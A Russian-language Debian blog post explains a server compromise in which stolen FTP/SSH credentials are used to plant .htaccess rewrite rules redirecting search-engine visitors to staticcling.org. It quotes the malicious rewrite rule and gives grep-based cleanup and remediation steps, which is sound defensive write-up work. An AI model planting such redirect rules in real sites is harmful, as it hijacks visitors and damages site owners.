Debian.pro

Блог для пользователей и администраторов Debian


Напасть на web-серверы с mod_rewrite. Редирект на *. staticcling .org при переходе на сайты из поисковиков. Редирект на чужой сайт при переходе из поисковика. staticcling org

Ах да. Мануалы новые до релиза squeeze писать не буду. Also активно зарабатываю деньги на новый домен, поэтому времени вообще мало)

Собственно. Столкнулся с тем, что при переходе на сайты одного из пользователей подконтрольного мне сервера из поисковиков посетителей сайта редиректило черти куда. Домен второго уровня был staticcling.org (а вообще редиректило на третий домен отсюда с огромным линком после слеша).

Гадость известная. Подвержены этой гадость в первую очередь php-cgi+apache2. Тем не менее, модификации данного алгоритма подпортят жизнь и тем, кто использует mod_php.
Виндузятный пользователь методом трояноигнорирования дарит пароль от фтп или ssh неизвестным благодетелям. Благодетели после этого запускают скриптик, который:
1) удаляет все нативные (родные для сайта) .htaccess и кладет в /home/user/php-bin (или какой у вас там каталог с Handlerами пользователей) свой .htaccess или
2) удаляет все нативные .htaccess и кладет в каждый каталог свои. Или кладет один, но в корень сайта.

Примерное содержимое (сдернуто с форума ispsytem):
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*(aol|google|rambler|mail|yandex|bing|yahoo).*$ [NC]
RewriteRule .* http://clasquerastmi.staticcling.org/wstat/accepter.php?h=%{HTTP_HOST}&u=%REQUEST_URI}&f=2015549ca2aaeedc970d91a54aae40e3&d=2b8eef35baffd3bc19f6783535f3504d [R,L]

Порядок действий.
1) вычисляем все зараженные сайты на сервере
2) меняем пароли на ftp/sftp/ssh у всех аккаунтов, которые могли поиметь доступ к файлам пораженных сайтов
3) читаем /var/log/xferlog и ищем тех, кто трогал наши .htaccess
4) пишем на плохих дяденек абузу хостеру.
5) даём в тык хомякам, которые до сих пор хранят пароли на ftp/sftp в десктопных клиентах под виндой
6) даём им ещё раз в тык
7) заставляем вылечиться от трояна. Не даём им новые пароли, пока не будем уверены, что они вылечились.
8) делаем
grep -rn staticcling /blah/blah/where/your/website/files
от рута сразу.
9) делаем
grep -rn staticcling /home/user/data/php-bin
(в данном случае /home/user/data/php-bin стоит заменить на каталог, где валяется php-handler и юзверский php.ini для CGI, например:
host /home/user/data/php-bin # ls
php php.ini )
10) staticcling стоит заменить на любой кусок URLя, на который редиректит посетителей, если редиректит не на staticcling
На всякий случай делаем:
grep -rn staticcling /
когда нагрузка на сервер спадет в ночное время
11) удаляем все файлы, которые найдёт grep -rn, либо чистим их.
12) ищем и восстанавливаем оригинальные .htaccess

Собственно, данная вариация трояна — лишь пристрелочная. Редирект то даже идет на несуществующую страницу. Но стоит ожидать того, что редиректы будут уже на реально работающие сайты с клубничкой или варезом. При том с похожими доменами. Ну вы поняли зачем оно надо.


Комментарии (2):

  1. Zero :

    Что за дебил это писал!?? словно русский язык и не знает!

  2. Я уверен, что вы его очень хорошо знаете ;)

Написать комментарий